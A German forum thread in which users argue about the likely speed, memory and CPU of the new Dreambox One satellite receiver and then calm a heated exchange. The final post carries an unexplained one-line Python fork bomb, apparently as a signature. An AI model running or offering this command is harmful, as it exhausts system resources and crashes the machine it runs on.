Neue Dreambox - Dreambox One

    Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

    • nicht wirklich weil du das viele Memory und den Flash eigentlich brauchst um die Minimalanforderungen fürs Android zu haben. Die CPU ist nicht deutlich flotter als die der 9x0. Gegen die 52x ist es hingegen eine super box.

      Ich habe allerdings einiges an Ideen was man mit dem vielen ueberzählichem Memory machen kann.

      Es hat schon einen Grund warum ich das Adrenalin auf Python umgebaut habe oder OoZooN gebeten den fuse Treiber fix in den Kernel zu machen :whistling:

      Was ich euch übrigens auch empfehlen würde :D

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von Lost in Space ()

    • Wie soll sich das denn bei den derzeitigen Anwendungen auf einer STB noch großartig auswirken? Tatort in 45 statt in 90 Minuten? Hast du überhaupt eine DM9x0, um zu wissen wie schnell die in der Praxis ist? Im Profil sehe ich zumindest keine. Statt 15 Sek. Bootzeit vlt. 12 Sek. und HbbTV geht ne Ticken schneller. Was soll da auch mehr passieren?
    • Quad Core vs Octa Core was heißt DAS in der Realität?

      12000/4=3000 vs. 36800/8=4600 das sind für den einzelnen Core ca. 53% mehr Leistung.

      Wenn man weis, dass trotz verbessertem Multprocessing Support im DreamOS immer noch wesentliche Dinge nur auf einem Core laufen, dann macht das zwar einen Unterschied, der ist aber eben weit von dem entfernt was die reinen Zahlen suggerieren.

      LG
      gutemine
    • Doch, durch die Kombination mit dem vielen Memory und den schnelleren Cores sollte die Box schon agiler sein. Du kannst davon ausgehen das DP wenn du nicht mit Andoid gebootet bist den reservierten Graphikbuffer deutlich größer wie auf den jetztigen Boxen umsetzen wird sofern der chip das hergibt. Und mit dem Rest kann ich schöne sachen machen wie alle Files in einen riesigen Filesystemchache zwingen womit das gesamte DreamOS aus dem Memory laufen würden - und ja das ist dann ... schneller als gewohnt ...

      Du kannst dann Timeshift ins Memory machen, womit das springen darin pfeilschnell sein müsste, alle Matafiles von der Harddisk inklusive cover, etc ins Memory laden, womit die Harddisk nicht mehr hochfahren muss beim Blättern in der Movieliste (=Adrenalin), alle Picons,...

      Die Frage wird allerdings sein wie gut der billige fixe Tunerchip das auch umsetzen kann, weil für die Geschwindigkeit beim Zappen spielt das auch eine große Rolle wie rasch der Tuner empfängt ... bei dem Preis können wir da nicht viel mehr als bei der 52x erwarten, was die box wieder bremsen würde.

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von Lost in Space ()

    • Ihr solltet wirklich nicht über die Leistung spekulieren da ihr keine Ahnung habt, das gilt auch für gutemine und Joey ;)

      Und gutemine FYI der 7252S ist ein Dualcore (2x1,7GHz), der Amlogic S912 hat 8 (2x4) ECHTE Kerne, 4x1,5 GHz und 4x1,0 GHz

      Dieser Beitrag wurde bereits 3 mal editiert, zuletzt von dhwz ()

    • ok, und jetzt haben sich alle wieder lieb ...... das ist doch die Dreambox ONE nun wirklich nicht Wert, sich deswegen zu streiten.
      Einige werden sie lieben, andere werden ganichts mit ihr anfangen können. Was geht und was nicht, wissen wir, wenn sich im Handel ist.
    • Doch das funktioniert eigentlich jedes mal, du musst nur möglichst überzeugt und kompetent klingend Blödsinn behaupten und schon gibt es neue Infos weil die Wissenden sich das nicht mehr anhören wollen was geschwafelt wird :D

      In der Politik ist das leider andersrum, da wirst du dafür gewählt :doh:

      Mehr als das ich auf den alten Boxen schon Sachen andenken oder entwickeln kann die bei der neuen erst wirklich gut funktionieren werden, kann ich ja auch dazu im Moment nicht sagen :prost:
    • Naja, der Ton machte gerade die Musik, und das hätte sich jetzt unnötig hochschaukeln können. Gerade wenn man mehr weiß als andere, aber nichts konkretes darüber sagen darf, um den Spekulationen den Wind aus den Segeln zu nehmen, sollte mal lieber garnichts dazu sagen. Threads über die ONE gibt es ja genug, da wird ja schon eine ganze Weile wild spekuliert ....
    • Na ja sagen wir mal so ich denke ich weis was dann alles auf mich zukommt, wobei das keine Zigarrenkiste ist :*

      Letztendlich wird das alles ... in jedem Fall ... lustig ... werden :blumen:

      Ich benutze außerdem meine Streichhölzer längst nicht mehr so oft wie früher :pleased2:

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von Lost in Space ()

    • Kommt alle mal runter und wartet ab bis es diese Klapperkiste gibt dann seht ihr was die leistet oder auch nicht aber sich gegenseitig die Ahnung abzusprechen habt ihr doch nicht nötig oder?
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !